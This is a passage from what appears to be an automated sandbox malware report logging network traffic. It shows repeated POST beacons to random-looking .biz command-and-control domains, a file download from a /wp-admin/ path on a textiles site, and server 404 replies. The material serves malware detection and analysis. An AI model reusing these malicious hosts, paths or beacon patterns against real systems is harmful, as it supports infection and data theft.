                Source: global trafficHTTP traffic detected: POST /kuspgbuc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ixcw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /yvoikxldsfcfgso HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ugrdtwtacn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /exeqm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /dknfakeq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /mmqkhapthxjsnh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ndtogcedgg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /hkulo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /sdsuahsrg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /otgkntfmpmq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /umcybsxuaomkr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ilidqggw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /digagk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /iiuonvofxn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /nroqcaxg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /nuoraorjkrhft HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /krrofgdqsat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /smeisoexdoewo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /yhsygfwinibyek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /tdfnnvngg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ydwthbku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /jmryxuilbmw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /vbgexw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /flarmrvjgo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /iatkorfmnwf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /cmvqnkktnlmsiyi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /vkwyeg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /tflprvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ybbogla HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /cgoaec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /qvm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /vatx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /cuqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /hui HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /kiywguufjdpqtpf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ehquov HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /vppkcegilvgf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /hpk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /fkax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /kkr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /gqqjufjjpxhxqwb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /obdt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /pirbxlgko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /uvrr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /xvbdrvgarw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /rxnqqlqsl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /wxnfkxfh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: unknown TCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: global traffic HTTP traffic detected: GET /wp-admin/233_Jwsmvmdweya HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: chichometextiles.com
                Source: global traffic DNS traffic detected: DNS query: chichometextiles.com
                Source: unknown HTTP traffic detected: POST /xvpanbchxym HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 802
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:23:56 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:24:04 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:24:09 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:24:10 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:24:20 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:24:20 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.27.2 Date: Fri, 01 Nov 2024 07:24:27 GMT Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=20
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.27.2 Date: Fri, 01 Nov 2024 07:24:43 GMT Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=20
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:24:52 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:24:52 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:25:12 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 01 Nov 2024 07:25:13 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Ascii: <html><head><title>404 Not 
